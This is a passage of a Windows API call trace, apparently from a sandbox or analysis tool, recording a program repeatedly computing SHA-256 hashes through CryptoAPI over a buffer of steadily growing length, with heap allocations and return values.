	[0253.234] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5d50, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5d50, pdwDataLen=0x128c3c) returned 1
	[0253.234] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.234] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.234] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.234] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.234] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0253.234] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.234] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5d78
	[0253.234] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5d78, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5d78, pdwDataLen=0x128c3c) returned 1
	[0253.234] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.234] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.234] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.235] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.235] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0253.235] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.235] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5da0
	[0253.235] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5da0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5da0, pdwDataLen=0x128c3c) returned 1
	[0253.235] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.235] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.235] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.236] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.236] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0253.236] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.236] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5dc8
	[0253.236] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5dc8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5dc8, pdwDataLen=0x128c3c) returned 1
	[0253.236] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.236] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.236] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.236] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.236] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0253.236] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.236] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5df0
	[0253.236] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5df0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5df0, pdwDataLen=0x128c3c) returned 1
	[0253.236] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.236] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.236] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.237] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.237] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0253.237] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.237] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5e18
	[0253.237] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5e18, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5e18, pdwDataLen=0x128c3c) returned 1
	[0253.237] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.237] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.237] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.237] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.237] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0253.237] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.237] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5e40
	[0253.237] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5e40, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5e40, pdwDataLen=0x128c3c) returned 1
	[0253.237] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.237] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.237] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.238] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.238] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0253.238] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.238] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5e68
	[0253.238] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5e68, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5e68, pdwDataLen=0x128c3c) returned 1
	[0253.238] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.238] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.238] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.238] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.238] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0253.238] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.238] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5e90
	[0253.238] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5e90, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5e90, pdwDataLen=0x128c3c) returned 1
	[0253.238] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.238] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.238] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.239] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.239] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0253.239] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.239] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5eb8
	[0253.239] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5eb8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5eb8, pdwDataLen=0x128c3c) returned 1
	[0253.239] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.239] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.239] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.239] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.239] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0253.239] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.239] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5ee0
	[0253.239] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5ee0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5ee0, pdwDataLen=0x128c3c) returned 1
	[0253.239] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.240] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.240] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.240] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.240] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0253.240] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.240] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5f08
	[0253.240] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5f08, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5f08, pdwDataLen=0x128c3c) returned 1
	[0253.240] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.240] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.240] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.240] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.240] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0253.240] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.240] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5f30
	[0253.240] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5f30, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5f30, pdwDataLen=0x128c3c) returned 1
	[0253.240] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.241] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.241] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.241] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.241] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0253.241] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.241] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5f58
	[0253.241] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5f58, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5f58, pdwDataLen=0x128c3c) returned 1
	[0253.241] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.241] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.241] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.241] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.241] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0253.241] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.241] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5f80
	[0253.241] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5f80, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5f80, pdwDataLen=0x128c3c) returned 1
	[0253.242] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.242] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.242] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.242] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.242] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0253.242] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.242] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5fa8
	[0253.242] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5fa8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5fa8, pdwDataLen=0x128c3c) returned 1
	[0253.242] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.242] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.242] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.242] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.242] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0253.242] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.242] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5fd0
	[0253.242] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c5fd0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5fd0, pdwDataLen=0x128c3c) returned 1
	[0253.243] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.243] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.243] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.243] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.243] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0253.243] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.243] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c5ff8
	[0253.243] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c5ff8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c5ff8, pdwDataLen=0x128c3c) returned 1
	[0253.243] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.243] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.243] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.243] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.243] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0253.243] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.243] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6020
	[0253.244] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6020, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6020, pdwDataLen=0x128c3c) returned 1
	[0253.244] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.244] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.244] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.244] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.244] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0253.244] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.244] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6048
	[0253.244] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6048, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6048, pdwDataLen=0x128c3c) returned 1
	[0253.244] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.244] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.244] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.244] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.244] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0253.244] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.245] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6070
	[0253.245] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6070, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6070, pdwDataLen=0x128c3c) returned 1
	[0253.245] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.245] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.245] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.245] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.245] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0253.245] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.245] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6098
	[0253.245] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6098, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6098, pdwDataLen=0x128c3c) returned 1
	[0253.245] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.245] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.245] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.245] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.245] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0253.246] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.246] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c60c0
	[0253.246] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c60c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c60c0, pdwDataLen=0x128c3c) returned 1
	[0253.246] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.246] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.246] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.246] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.246] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0253.246] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.246] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c60e8
	[0253.246] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c60e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c60e8, pdwDataLen=0x128c3c) returned 1
	[0253.246] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.246] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.246] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.246] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.246] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0253.247] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.247] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6110
	[0253.247] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6110, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6110, pdwDataLen=0x128c3c) returned 1
	[0253.247] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.247] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.247] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.247] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.247] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0253.247] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.247] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6138
